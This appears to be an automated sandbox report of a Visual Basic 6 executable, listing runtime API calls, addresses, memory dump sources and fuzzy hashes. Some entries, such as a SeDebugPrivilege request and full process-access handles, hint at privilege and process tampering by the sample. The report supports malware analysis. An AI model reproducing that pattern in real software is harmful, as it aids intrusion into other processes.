                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1701566546-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                    • #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                    • #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F218
                                                                                    • #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F238
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
                                                                                    • #616.MSVBVM60(?,-00000001), ref: 0041F251
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041F25C
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041F265
                                                                                    • __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041F2B8
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$ErrorMove$#537$#606#616AnsiChkstkOverflowSystemUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1093449089-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 0041A39A
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041A3AB
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041A3C3
                                                                                    • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 0041A420
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 1749655604-2896544425
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                    • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                    • __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3031735744-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CBB8,80000002,00000000,00000000), ref: 00429E2E
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E5B
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429E67
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00429E76
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429E8F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 00429E9F
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EAD
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EB6
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429ECB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429EDB
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429EE9
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429EF2
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429F08
                                                                                    • __vbaFreeStr.MSVBVM60(00429F32,?,?,?,00000000,004032B6), ref: 00429F22
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429F2B
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 3031735744-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0041B687,0042C0E8,?), ref: 0041599E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,00000000,660E6C30,660E0EBE,?,Function_000032B6), ref: 004159CE
                                                                                    • #580.MSVBVM60(?,00000000), ref: 004159E3
                                                                                    • #648.MSVBVM60(0000000A), ref: 00415A02
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00415A0F
                                                                                    • __vbaFileOpen.MSVBVM60(00000020,000000FF,?), ref: 00415A2B
                                                                                    • #570.MSVBVM60(?,?), ref: 00415A42
                                                                                    • __vbaPut4.MSVBVM60(00000000,00000000,-00000001), ref: 00415A58
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00415A6D
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,?), ref: 00415A7E
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00415A87
                                                                                    • __vbaFileClose.MSVBVM60(?), ref: 00415A99
                                                                                    • #580.MSVBVM60(?,00000027), ref: 00415AAE
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00415AE2
                                                                                    Similarity
                                                                                    • API ID: __vba$#580ErrorFileFree$#570#648ChkstkCloseCopyOpenOverflowPut3Put4
                                                                                    • String ID:
                                                                                    • API String ID: 633625294-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,?,0040DFD2,?,?,?,Function_000032B6), ref: 00419B2E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 00419B5E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B79
                                                                                    • #525.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419B83
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 00419B8E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BA9
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BC4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,?,Function_000032B6), ref: 00419BD6
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 00419BE4
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419BED
                                                                                    • #519.MSVBVM60(?,?,?,?,?,?,?,Function_000032B6), ref: 00419BFE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C09
                                                                                    • __vbaFreeStr.MSVBVM60(00419C3D,?,?,?,?,?,?,Function_000032B6), ref: 00419C36
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00419C53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$FreeMove$#519#525AnsiChkstkOverflowUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 3463755217-0
                                                                                    • Opcode ID: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                    • Instruction ID: 59ab86815b635178f25ac20134c8c30b5a73cca353c440905f8b97c0bcbdadc5
                                                                                    • Opcode Fuzzy Hash: b493d4c5f5f54a827ca7640190fff222c55f1d558614f84cc34330e3b91e4b31
                                                                                    • Instruction Fuzzy Hash: D331CE75900248EFCB04EFA4DA48BDE7BB4FB48305F108669F501B7260DB799A44CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,660E19DC,00000000,00000FEE), ref: 0042134B
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000), ref: 00421365
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421386
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00421395
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 004213A2
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004213BD
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004213C6
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004213E9
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004213F9
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004213FF
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00421412
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042143F,660E19DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF), ref: 00421438
                                                                                    • __vbaErrorOverflow.MSVBVM60(00000000,660E19DC,00000000,00000FEE,?,?,?,?,?,?,?,?,?,7FFFFFFF,Function_000032B6), ref: 00421450
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3281955820-0
                                                                                    • Opcode ID: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                    • Instruction ID: d3bc4d229a8ccd66a9bed061019a776db086e1d909af8dc46df260a90b41282b
                                                                                    • Opcode Fuzzy Hash: 47b01bcdffa297faf139a01935df7f97165424e177e24eb6e474878f494e6cb8
                                                                                    • Instruction Fuzzy Hash: 5E418170E00219DFDB14EF94DD81AAEF7B9EF58700F50811AE501B7660D6B4A8428BE9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000004), ref: 0042A30A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,000000E0,?,?), ref: 0042A334
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004098D4,00000188,?,?,?,?), ref: 0042A35B
                                                                                    • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?), ref: 0042A36D
                                                                                    • __vbaAryLock.MSVBVM60(?), ref: 0042A37D
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 0042A39C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3B1
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042A3C7
                                                                                    • __vbaI4Var.MSVBVM60(?,00000000,?,?,?,00000000), ref: 0042A3E6
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042A3F6
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0042A400
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0042A409
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0042A412
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$CheckFreeHresult$CallLateLockRedimSystemUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 204333147-0
                                                                                    • Opcode ID: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                    • Instruction ID: 897c9a6cfbc361b2304c829fc1f6f3fe0cbd2f804f2c9409275e98d7ea74f451
                                                                                    • Opcode Fuzzy Hash: eed45411d0b160e1ff50d70acd90705767be5c6f0f77f9bda94638718aae2953
                                                                                    • Instruction Fuzzy Hash: E031A234600215EBDB04DBA0DD89EAEB779FF44704F208529F902BB2A1D774AC46CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                    • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                    • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A175
                                                                                    • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A1B2
                                                                                    • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A207
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A230
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A246
                                                                                    • __vbaSetSystemError.MSVBVM60(?,0042C27C,?,?,?,00000000,Function_000032B6), ref: 0041A26C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041A28F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 1207130036-0
                                                                                    • Opcode ID: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                    • Instruction ID: 8b7a934a7eebc36cfe3af54c4ed22efe6341180558cb6e4886e9f12f2822d10f
                                                                                    • Opcode Fuzzy Hash: e179d2bbb2490744295fa45cb8a75386843ea1c857eacf9360e485d96fec70f9
                                                                                    • Instruction Fuzzy Hash: 7B51FA74901208EBDB10DFE4DA48BDEBBB5FF48308F208569E501B7390D7799A44DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6,?,?,?,0040F418,0042C0BC,?), ref: 0041E74E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0041E77E
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0041E795
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7A1
                                                                                    • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E7AF
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0041E7B8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7D3
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7E4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7F5
                                                                                    • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E803
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,Function_000032B6), ref: 0041E811
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,Function_000032B6), ref: 0041E827
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                    • String ID:
                                                                                    • API String ID: 3861917509-0
                                                                                    • Opcode ID: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                    • Instruction ID: a92ad539ecbf6efebda2d3259df1282ada01a5d6d20107e5edffdf3838fad138
                                                                                    • Opcode Fuzzy Hash: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                    • Instruction Fuzzy Hash: 61310CB5900208EFCB00DFE4DA88FDEBBB8EB48314F108259F501B7290C7789A44CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(0040CEB3,004032B6,0040CEB3,?,?,?,00000000,004032B6), ref: 0041584E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040CEB3,004032B6,0040CEB3), ref: 0041587E
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041589D
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004158AA
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 004158C9
                                                                                    • #570.MSVBVM60(?), ref: 004158DB
                                                                                    • #525.MSVBVM60(00000000), ref: 004158E2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004158ED
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,?), ref: 00415905
                                                                                    • __vbaFileClose.MSVBVM60(?), ref: 00415917
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041592A
                                                                                    • __vbaFreeStr.MSVBVM60(0041595E), ref: 00415957
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                    • String ID:
                                                                                    • API String ID: 947554498-0
                                                                                    • Opcode ID: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                    • Instruction ID: 9d0290c9668b0b97bc5e056eca09828b1551f52cd0b7d0ae963dc3f7ea44dd8b
                                                                                    • Opcode Fuzzy Hash: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                    • Instruction Fuzzy Hash: A0314BB5C00248EBDB00DFD4DA48BDEBBB8FF08714F208159E611B72A0DB795A48CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040FF4E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040FF95
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0040FFC6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,0000004C), ref: 0040FFF9
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00410038
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,00000040), ref: 004100B9
                                                                                    • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 004100DC
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004100EF
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 00410112
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041011D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 00410150
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0041016B
                                                                                    Strings
                                                                                    Memory Dump Source
